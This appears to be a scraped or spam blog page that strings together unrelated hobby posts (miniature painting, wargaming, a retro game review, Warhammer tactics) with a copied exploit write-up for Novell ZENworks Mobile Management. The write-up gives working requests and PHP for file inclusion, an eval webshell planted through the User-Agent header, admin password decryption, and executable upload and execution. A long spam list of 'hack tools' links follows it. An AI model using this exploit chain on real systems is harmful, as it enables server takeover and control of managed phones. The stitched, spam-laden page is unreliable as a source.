Tuesday, September 22, 2020

Convergence Hobby Update - Speed Painting CoC


One of the theories I had about owning a Convergence of Cyriss army is that it would be very easy to paint quickly.

I am not a particularly skilled painter, though I truly enjoy it when I have a fully painted list on the table. I paint to a standard that I can look at the model from 3 feet away and be happy with it. Not what the crazy painter friends I have are happy with, but what I'm happy with being on the table. This is important as a standard because painting is about time and I don't particularly have a lot of it.

A large part of my enjoyment comes from the idea that once I have a faction fully painted, I can just put it on the table and play and not have to think "damn I need to get to painting this."

So the theory about painting CoC is that you can prime the models with a metallic spray paint, add in a few colors, apply a wash, and then be done.  Turns out this is actually true!






Since my last post about CoC spoke about how the bulk of the models I received were in really bad shape and I highlighted obnoxious the paint jobs were in addition to the fact that most everything was in pieces when it arrived, compare this to what the Monitor looked like before it was primed and painted:




That's quite a transformation! So how much effort was put into this from a painting perspective?


  • I based the model with sand/aquarium gravel.
  • I spray painted the model with some metallic spray paint, though I did test on the extra armless Axis model that was sent with my lot to make sure the primer wasn't going to be too thick. 
  • I spent roughly 2 hours or so applying the colors and washes to the primed model.
  • I also had to repaint the base and basing material black instead of silver, which was odd but worth it for how much time the whole process saved me.
I didn't get any fancy primer either, just some Rust-olium at Home Depot:


I should put a few notes, since it was slightly jarring with this as a primer.

The model will look almost comically silver when primed. In fact it was left slightly sticky, despite drying for nearly 24 hours after being primed. In fact before I started I was afraid the entire project was going to be a failure and I'd have to just prime everything black like I always do.

Luckily the washes came through for me in the end.  It's amazing what that did when combined with some gold and bronze paint on the model.  Everything turned out about as I'd have expected it in the end, and I'm at a point where I think I can really hammer out my CoC army probably well ahead of my Trolls.

As a point of painting comparison, I spent about two hours painting that Monitor. I spent about an hour and a half just touching up the base painting on my first Longrider unit, and I still have to finish painting the metals on it before I can apply my wash and then go back and hit a highlight to get the skin on the trolls the way I want it.

Perhaps it's because I'm pushing the Trolls to be painted to a much higher standard than what I think the CoC should be, but man does it just feel nice to be able to knock out a model and have it come out looking good enough for me to be happy with. For my Trolls I feel like I need to put in all this extra work to get it to a point where I'm happy. I suppose that's the difference between having models of something organic like a beast or a infantry with lots of exposed flesh vs. robots. Here's an example of what I paint my Trolls to:



Right now I have to admit it's almost tempting to just try and get the CoC going. I did get lucky and have my wife agree to let me play in our local Scrum League (think a Steamroller with 1 game a week), and lists are due Friday. I was very likely playing Trolls in it, though after last night I admit that I've had some thoughts about playing CoC instead. I have two days to decide!
Posted by at No comments:

Monday, September 21, 2020

The Battle Of Little Bluephoam River.

Since this was essentially a  test  of the revised board and the revived rules, I decided to just go with a straight encounter battle. Two forces vying  for control of a bridge seemed as good a scenario as any, classic really.

The Rebel cavalry got to the bridge first and dismounted to hold it rather than rushing across in hope of winning a piecemeal battle with the Dominion cavalry.  An indecisive firefight between the opposing cavalry lasted until the infantry on both sides took their place.

As the infantry came up, Gen Douglas sent the Dominion cavalry to the right to cross the river. Gen Lannigan reacted quickly to send his cavalry to block them and ordered two "brigades" of infantry to cross over on his right.


It took a while for the armies to march on and deploy, (about 1/2 the game) but once they did, things quickly heated up.


A charge by the Gentlemen Pensioners in their shiny breastplates broke two squadrons of Rebel cavalry but not without losses and the Reb battery soon scattered the remnants of them. The Rebel infantry assault was broken up by terrain and ended  up going in piecemeal.


Each side rushed reinforcements into action and the fighting became heavy across the board.


Encouraged by the appearance of their Spirit Cat, the Rebel infantry poured across the river and closed with the enemy.


An attack by the Grenadiers on the farm was easily repulsed and things were looking dark for the Dominion forces.


The battle was not yet lost or won though and the Hochelaga Fusiliers renewed the assault.


The Dominion right flank had taken horrendous casualties but the men rallied and held their ground.  Finally the Blue wave halted and one flank began to give way.

As the sun sank towards the horizon, the Fusiliers drove their enemy from the farm and repulsed all counter attacks while the Grenadiers poured back over the river to reinforce the bridgehead. On the far flank, Rebel losses mounted and soon the whole army was on the edge of giving way. General Lannigan signalled a retreat. Best to save the army to fight again. The Dominion  forces had a crossing but they were not going to get far tonight.

(In other words, at the end of 15 turns, Red had a secure foot hold on the other side of the river while Blue had a very insecure one and had also suffered more units lost and most of his units were only 1 hit away from breaking. The GM declared it a marginal win for Red.)







z

Posted by at No comments:

Saturday, September 12, 2020

A Close Race!

What's going on everyone!?


Today for the #2019gameaday challenge my dear ol' dad and I played a game of Ticket to Ride. 

It was a very close game and surprisingly I came away with the win somehow! 

As usual, it was a good game and he sure doesn't make it easy, lol.


As always, thank you for reading and don't forget to stop and smell the meeples! :)

-Tim

Posted by at No comments:

Game 378: Goodcode's Cavern (1982) And Romero/Carmack Corrections

            
Goodcode's Cavern
United States
Gebelli Software (publisher)
Released 1982 for Atari 800
Date Started: 3 September 2020
Date Ended: 3 September 2020
Total Hours: 2
Difficulty: Easy (2/5)
Final Rating: (to come later)
Ranking at time of posting: (to come later)
     
In today's edition of "If It Were Any Good, It Wouldn't Have Taken 10 Years to Show Up on MobyGames," we have Goodcode's Cavern, also known as Dr. Goodcode's Cavern (the box cover, title screen, and manual all slightly disagree). This all-text game plays like a combination of The Devil's Dungeon (1978), with its numbered rooms and magic wand as the only piece of player inventory, and Rodney Nelsen's Dragon Fire (1981), with its randomly-generated room descriptions. Its concepts are basic enough, however, that it might have been influenced by neither.
     
The setup is that Doctor Goodcode has purchased a mansion and found the caverns beneath it inhabited by monsters. He wants you, an adventurer, to clean it out. Thus begins your exploration of a randomly-generated three-level dungeon with 80 rooms per level. Your goal is to make it to the exit with as much treasure and as many kills as possible.
             
Stepping into the first room.
        
There's no character creation process. Everyone seems to start with a strength of 86 and no assets except a magic wand with three charges. The dungeon is laid out like a node map, with each room connecting to up to four others in the four cardinal directions. You can wind your way through all 80 rooms on each level in numerical order or watch for the occasional opportunity to jump from, say, Room 40 to Room 57. That's about the only "choice" you get in the game.
  
As you enter each room, the game draws from a collection of random terms and phrases, so one might be described as a "light blue room with a wooden floor" and the next a "ruby red room with a dirt floor." A selection of atmospheric effects finalizes the description: "There is a pool of blood"; "It smells like a fire"; "It is very musty in here." Each room can have nothing, some gold pieces strewn about, or an encounter with a monster.
          
This room is pink with a thick carpet and there's moaning.
           
Monsters include snakes, orcs, alligators, tigers, vampires, wild dogs, frogs, and cave bears. Each has a randomly-selected descriptor and color, so you might get a "mean white snake" or a "gruesome russet wild dog" or a "mammoth yellow vampire." Not only that, but there's a random exclamation before the monster ("Hot tacos!"; "Jiminy Cricket!") and each monster has a random behavioral descriptor after his name; for instance, "he is starting towards you" or "he is looking hungry." Each monster also has a strength level. Your only options are to "Defend" (which seems to do nothing), "Attack," or zap the creature with your magic wand. The latter kills everything instantly, but you only have three charges to start.
              
Hot tacos indeed. Although I suspect if I saw a blue grizzly bear, I'd start blaming something else I got in Mexico.
             
Attacking pits your strength against the monster level, and behind a bunch of colorful flashes, the game calculates how much health you and the monster lose. Some battles take up to three rounds. If you win, you get whatever treasure that monster was carrying, which again is drawn from a list of random descriptions and values. You might find an "ugly iron ring" worth nothing or a "bright gold chalice" worth 11,000 gold pieces. You only have 20 treasure slots, so you often find yourself discarding cheap treasures to make room for more expensive ones. There are no other inventory items in the game.
          
Finding a "nickel headband" and then checking my status.
        
As you defeat monsters, your level goes up, and I guess maybe it improves your odds in future combats. If so, it's not really palpable. Leveling is a bit weird, because it's expressed as two numbers, like "1-40" or "2-67." I couldn't tell where the first number rolls over; I think my winning character got to "2-110." Equally mysterious is how health regenerates. Your health is represented as a percentage--the higher the more you're wounded--and sometimes it seems to drop as you move between safe areas, but other times it remains stubbornly the same.
        
The mammoth russet vampire was a little too much for me, so I zapped him with the wand. I'm glad I did, because the colossal gold knife was worth a lot of money.
        
In addition to regular monsters, demons of various colors and descriptions (e.g., "yellow cave demon"; "pink sewer demon") pop up randomly and extort gold from you under a variety of excuses, including loans, protection money, and buying tickets to the "demon's ball." They ask for relatively little gold, and you can't fight them anyway, so there's nothing to do but hit B)ribe and pay them. Their demands don't even get more expensive on lower levels. It's a very weird dynamic.
          
A demon convinces me to pay reparations.
         
The game has an odd fixation with color. Not only do you get color descriptions for the rooms, monsters, and treasure, but the main screen frequently changes color, flashes different colors when combat is happening, and sticks different colored boxes randomly on the sides of the screen. I guess the developer was just showing off the capabilities of the system. It didn't affect my experience either way; I just found it strange.
    
If you die at any point, you can quickly hit the joystick button to resurrect in the same room for a minimal cost, but it fails about half the time.
              
No, but you can resurrect me.
         
Room 80 of the first two levels is a special room where a demon will buy your treasures for cash and then sell you food, a compass, information, or an extra two "zaps" for the wand. I have no idea what food does; buying it seemed to have no effect. Ditto the compass. "Information" resulted in nonsense clues (e.g., "you will meet a tall dark stranger") whenever I tried. The extra zaps are priceless, though, and you can make more than enough money on Level 1 to ensure that you can just use your wand to blast through the next two levels, although using the wand nets you no experience.
         
Room 80 on Level 1.
        
Room 80 on Level 3 presents you with a "wizened old man" seated at an organ. The door slams shut behind you, and your wand starts to flicker. This seems like an obvious clue to Z)ap the wand, but in fact it doesn't matter what action you take; the outcome is the same: you win the game and the program recaps the amount of treasure you collected and the number and strength of monsters you killed. Presumably, you're meant to keep replaying for higher scores.
    
The winning screens.
         
This is the sort of game that I would have seen in a bargain bin at Electronics Boutique in 1984. I would have been suspicious of its $7.95 price sticker, assuming it couldn't possibly deliver much content for that price, but I would have bought it with hope anyway, taken it home, and tried my best to supplement my wanderings with my own imagination, pretending I was having fun, but feeling in some vague way that there must be more to life than this.
           
Cavern barely passes as an RPG. It has one inventory item that you can choose to use; I guess it has some statistics behind the combat; and there is that mysterious "level." It gets only a 10 on the GIMLET, with 2s in economy, interface, and gameplay and 0s and 1s in everything else. I can't find the game even mentioned in a contemporary source, let alone reviewed.
         
I have no idea what's happening here.
                  
Dr. Goodcode, whoever he was, never made another appearance (search the name without Cavern and you get nothing). The rest of the title screen is equally mysterious. If the dedicatee, "Kitty Goodcode," wasn't a James Bond girl, she also wasn't anyone else as far as I can tell. Perhaps the only notable thing is that it was published by Gebelli Software, which was a short-lived California-based enterprise from Nasir Gebelli, the famed Apple II developer who went on to work on the Final Fantasy series at Square. I'm participating in a podcast with John Romero later in September, and I know he knows Gebelli, and I suppose I could ask him to ask Gebelli to confirm who Dr. Goodcode was, but .  . . there are times that tracking down the original developers to some of these 1980s games honors them, and there are times that it doxxes them. This seems like one of the latter.
   
But since I was only able to get 1,200 words out of Goodcode's Cavern, let me use the rest of this space to explore a lesson that I recently learned about secondhand journalism. A few years ago, in writing about Dark Designs III: Retribution! (1991), I wrote the following:
            
1991 was a major transition year for Carmack and his new partner, John Romero. At the age of 20, Carmack had gotten a job two years prior at Softdisk, largely on the strength of his Dark Designs series. But he and the other developers grew to despise the sweatshop-like atmosphere of Softdisk and the monthly programming demands. He and Romero began moonlighting by selling their own games--principally the Commander Keen series--as shareware on bulletin board services. When Softdisk found out about these games, and that the pair had been using the company's computers to write them, both threats of a lawsuit and offers of a contract followed. The messy result was that Carmack and Romero left the company but agreed to continue to produce one game every 2 months for Softdisk's magazines. Thus, a couple years later, after the team had changed the gaming world forever with Wolfenstein 3D and DOOM, you see them credited on the occasional diskmag title like Cyberchess and Dangerous Dave Goes Nutz!
            
I had consulted several sources to assemble that paragraph, including one that purported to have interviewed both Carmack and Romero in detail, and I was pretty confident in what I had. Fast forward to a few weeks ago, when John Romero (who I didn't even know was aware of my blog) invited me to participate in a podcast interview of Stuart Smith. (We're recording in mid-September; I'll let you know when it's out.) I took the opportunity to run the paragraph by him and found out that almost everything I'd written was wrong. To wit:
          
  • I was a year late; 1990 was the year most of this happened. Romero worked at Softdisk prior to Carmack and was actually the one who hired Carmack, not because of Dark Designs but because of a tennis game plus his obvious facility with programming.
  • Romero and Carmack loved working at Softdisk and only left because it was the wrong sort of publisher to take advantage of the horizontal scrolling technology that the duo would use in Wolfenstein 3D and DOOM.
  • It was actually the president of Softdisk, Al Vekovius, who suggested that Carmack, Romero, and Tom Hall start their own company. There were no lawsuits and no threats; Carmack and Romero kept working for Softdisk for a year to avoid leaving the company in a lurch.
  • The reason Carmack and Romero are credited on so many Softdisk titles stretching into the mid-1990s is that those titles used technology and code that Carmack and Romero had created. They otherwise had no involvement in games like Cyberchess and Dangerous Dave Goes Nutz!
      
All of this has been a lesson in putting too much faith in secondary sources, even when they agree and everything seems to fit together logically. I didn't get into this gig to be a journalist, and I have no formal training in journalism, but clearly my blog has veered in that direction at least occasionally, and as such, I need to adopt stricter rules for my use of sources, to make it clear when I'm speculating based on limited evidence, and to always see primary sources when they're available. I'm still working on these "rules," but they stopped me here in speculating on the identity of Dr. Goodcode even though I have a pretty good idea of who he is.
     
Sorry for the otherwise short entry, but you'll see a few more of these in September, as I have to devote more time to getting my classes going. Hopefully for the next entry, I can make some progress on The Summoning.
    

Posted by at No comments:

Friday, September 4, 2020

DE: Powerful Builds For Your HQ

You know you're in some shit if someone points.

This one is going to be a short one since we're going to be primarily focused on the use of HQs.  One thing's for damn sure:  I feel that we have some fantastic melee HQ options for the price.

Here are some my favorites so far:
  • Archon, Labyrinthine Cunning, Writ of the Living Muse = 72 base
  • Archon, Hatred Eternal, Djin Blade = 76 base
  • Archon, Famed Savagery, Djin Blade = 76 base
  • Succubus, Blood Dancer, Adrenalight, Triptych Whip = 54 base
  • Succubus, Hyper-swift Reflexes, Adrenalight, Blood Glaive = 54 base
  • Succubus, Precision Blows, Adrenalight, Triptych Whip = 54 base
  • Haeomculus, Diabolical Soothsayer, Vexator Mask = 75 base

Let's start with the Archons.  You've all probably seen me take the Archon with Cunning and Writ of the Living Muse in my lists.  That's because it's one of the most powerful Warlords in the game for the points IMO.  Cunning is absolutely fantastic at regenerating CPs whenever a CP is spent for both you and your opponents.  For DE, I find that some of our Strategems are a little costly, especially that Agents of Vect counterspell that costs 3 just by itself.  With Cunning, you can do some really crazy recycling that can help you sustain the longer gameplan:

For example:
  • You don't want a 2-cost Strategem to go off so you throw out Agents of Vect.
  • Before you even put AoV down, you roll 2 dice for his Strategem for Cunning.
  • Next, you AoV and since you just spent 3 CP, you roll 3 more dice to see if you get any back from Cunning.
  • Agents of Vect then takes effect, hopefuly blocking his Strategem.
  • In this example right here, you're probably going to get back a CP from just playing the game regularly.

When you play Black Heart, you almost have to bring Writ of the Living Muse.  It's one of the best buff batteries in the entire game and enhances the damage potential of every single Black Heart unit within 6".  Everything within this distance gets re-roll 1s to Hit and Wound that that is a huge damage amplifier, especially on things like Dark Lances and Disintegrators when you absolutely need to hit with your more expensive damaging weapons.  Living Muse simply gives you consistent damage and that's exactly what you need to turn your very good shooting up a notch to exceptional.

As for melee Archons, I see two main options here:  Both of which have the Djin Blade of course which is just an upscaled Huskblade.  Hatred Eternal gives you more consistent results via re-roll all wounds in melee but the Famed Savagery Archon from Flayed Skull gives you great burst damage.  With Famed Savagery, you have 8 S5 AP-3 D3 attacks that hits on 2s with re-roll 1s.  Personally, if I was to pick one of the two, I would go for more consistent damage with the Hatred Eternal Warlord trait.  There are bonus points in the fact that Hatred Eternal is a generic WL trait and thus doesn't lock you to any particular Obssession.  As for arming the Archons further, always seek out the Blaster first since you have a fantastic BS2+ and Blasters are amazing with their S8 AP-4 D6 damage from 18" (24" for Obsidian Rose).

I whip my hair back and forth.

The Succubus went from one of the most overcosted units in the entire game to arguably the most cost-efficient melee blender in the game.  I'll start off by listing the Blood Dancer variant that comes with 9 attacks hitting on 2s, re-rolling 1s, and each Hit roll of a 6 turns into 3 Hits instead of 1.  On the regular, she can throw out something like 14 attacks with an Agonizer (Poison 4+ AP-2 1D) and that's just obscene.  Against single wound models, she is almost guaranteed to wipe out entire squads by herself.  She just reminds me of the Blenderlord that I ran for Vampire Counts back in the days of Fantasy.  To make things even more exciting, once you hit Turn 3+, you can activate these multiple hits on a 5+ instead of 6 because of the PFP chart.  The only downside here is that she's a Succubus and she just explodes if anyone swings back at her because she only has a 4++/6+++ with T3 and 5 wounds.  Regardless, LO_OK at her points cost!  For 54 points, she's an absolute steal.  I can't help but hear this garbage ass song whenever she enters combat.

Other variants of the Succubus are also really strong; such as the Blood Glaive Succubus with 5 attacks with Adrenalight dealing S6 AP-3 D3 damage attacks.  I've seen this particular variant built two ways really; with either the Red Grief specific WL trait of 3++ or with Stimm Addict with Grave Lotus and Adrenalight.  This gives her 5 attacks at S7 which is now a serious threat to virtually all targets including light vehicles.  Again, 54 points of awesome.

Another variant I want to introduce you to someone who might be our best duelist.  She has 9 attacks with the Whip just like the Blender because she's from Cult of Strife (for +1 attack), however instead of Blood Dancer, she has the Precision Blows WL trait.  When you're hitting with 8-9 attacks every turn, you're going to be looking for 6s that can just do straight mortal wounds in addition to the regular wounds inflicted with an Agonizer.  That's very good.  For all these Succubus, I highly recommend taking a Blast Pistol on the Blood Glaive Succy to take advantage of her superior BS2+.  Funny enough, the Precision Blows Succubus can still do mortal wounds to Vehicles and Titans.

Never trust someone with 5-6, 7? arms.

Lastly, we have the Haemonculus that you will probably see most frequently if you're planning to take Coven units and Alliance of Agony for 1 CP.  This is because Diabolical Soothsayer essentially pays for itself immediately and you can get 2 more CP if you roll well (D3 in total).  Sure, you also get that once a game re-roll for your Warlord, but no one really cares about that because you also gain access to the Vexator Mask.  This thing is actually pretty hilarious.  You can basically take this Haemonculus and just charge into something to tie it up because they cannot use Overwatch on you.  You can then charge your Wyches into them for free without any fear of OW fire.  To make things even more enjoyable, the mask also gives an enemy unit with 6" of the Haemonculus ASL essentially, making them strike last after all other units have gone int the Fight phase.  That's just funny considering the amount of melee boss HQs we have in the Codex.

What are some of your favorite HQs to bring?  I know I've been extra boring with the Black Heart Archon, but hey, it's been working so why not!
Posted by at No comments:

Monday, August 31, 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');
}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Related articles

  1. Hacking Tools 2020
  2. Pentest Tools List
  3. Pentest Tools List
  4. Hack Tools For Pc
  5. Hacker Tools Free Download
  6. Hack Tools For Ubuntu
  7. Hacking Tools Free Download
  8. New Hack Tools
  9. Nsa Hack Tools
  10. Hacking Tools Name
  11. Pentest Tools Port Scanner
  12. Hack Tools
  13. Nsa Hack Tools Download
  14. Hack Tool Apk No Root
  15. Pentest Automation Tools
  16. Pentest Tools For Windows
  17. Hacking Tools For Games
  18. Kik Hack Tools
  19. Hack Tools For Windows
  20. Ethical Hacker Tools
  21. Best Pentesting Tools 2018
  22. Install Pentest Tools Ubuntu
  23. Usb Pentest Tools
  24. How To Install Pentest Tools In Ubuntu
  25. Hacker Tools Apk Download
  26. Pentest Tools Tcp Port Scanner
  27. Hak5 Tools
  28. Android Hack Tools Github
  29. Nsa Hack Tools Download
  30. Hacking Tools For Windows 7
  31. Hacker Tools Linux
  32. Hacker Tools Linux
  33. Pentest Tools Github
  34. Hack Tools Online
  35. Hacker Tools Linux
  36. Pentest Tools Tcp Port Scanner
  37. Pentest Tools Download
  38. How To Install Pentest Tools In Ubuntu
  39. Hacker Tools For Ios
  40. Hack Tools For Ubuntu
  41. Hacker Tools Linux
  42. Pentest Tools Open Source
  43. Hacker Tools For Pc
  44. Pentest Tools For Android
  45. Tools For Hacker
  46. Pentest Tools Find Subdomains
  47. Hacking Tools Hardware
  48. World No 1 Hacker Software
  49. Hack Tools Download
  50. Tools For Hacker
  51. Underground Hacker Sites
  52. Easy Hack Tools
  53. Hacking Tools Free Download
  54. Pentest Tools Framework
  55. Pentest Tools Open Source
  56. Tools Used For Hacking
  57. Pentest Tools For Mac
  58. Hacking Tools For Windows 7
  59. Pentest Tools Framework
  60. Pentest Tools Tcp Port Scanner
  61. New Hack Tools
  62. Hacking Tools For Mac
  63. Pentest Tools Linux
  64. Android Hack Tools Github
  65. Hacker Tools 2020
  66. Underground Hacker Sites
  67. Pentest Tools For Android
  68. How To Hack
  69. Hacking Tools For Mac
  70. Pentest Tools Nmap
  71. Hacker Search Tools
  72. Hacking Tools Online
  73. Pentest Tools Online
  74. Hacking Tools Usb
  75. Top Pentest Tools
  76. Kik Hack Tools
  77. Hacker Tools 2019
  78. Hacker Search Tools
  79. Pentest Tools For Windows
  80. Pentest Tools Kali Linux
  81. Install Pentest Tools Ubuntu
  82. Pentest Tools Bluekeep
  83. Free Pentest Tools For Windows
  84. Pentest Tools Windows
  85. Hacker Tools Apk
  86. Hacker Tools
  87. Beginner Hacker Tools
  88. Hacking Tools 2020
  89. Hacking Tools Free Download
  90. Hacker Tools Apk Download
  91. Hacking Tools Usb
  92. Hacking Tools Software
  93. World No 1 Hacker Software
  94. Tools For Hacker
  95. Hacker Tools Hardware
  96. Hack Tools Download
  97. Best Pentesting Tools 2018
  98. Hacker Techniques Tools And Incident Handling
  99. Hacking Tools Software
  100. Easy Hack Tools
  101. Hackers Toolbox
  102. Install Pentest Tools Ubuntu
  103. Hack Tools For Ubuntu
  104. Pentest Tools Open Source
  105. Android Hack Tools Github
  106. Nsa Hack Tools
  107. Pentest Tools Subdomain
  108. Hacker Search Tools
  109. Computer Hacker
  110. Hacker Tools Apk Download
  111. Hacking Tools Online
  112. Usb Pentest Tools
  113. Hacking Tools 2020
  114. Pentest Tools Open Source
  115. Ethical Hacker Tools
  116. Beginner Hacker Tools
  117. Hacker Tools For Windows
  118. Hacking Tools And Software
Posted by at No comments:

Sunday, August 30, 2020

Advanced Penetration Testing • Hacking The World'S Most Secure Networks Free PDF

More articles


Posted by at No comments:
Subscribe to: Posts (Atom)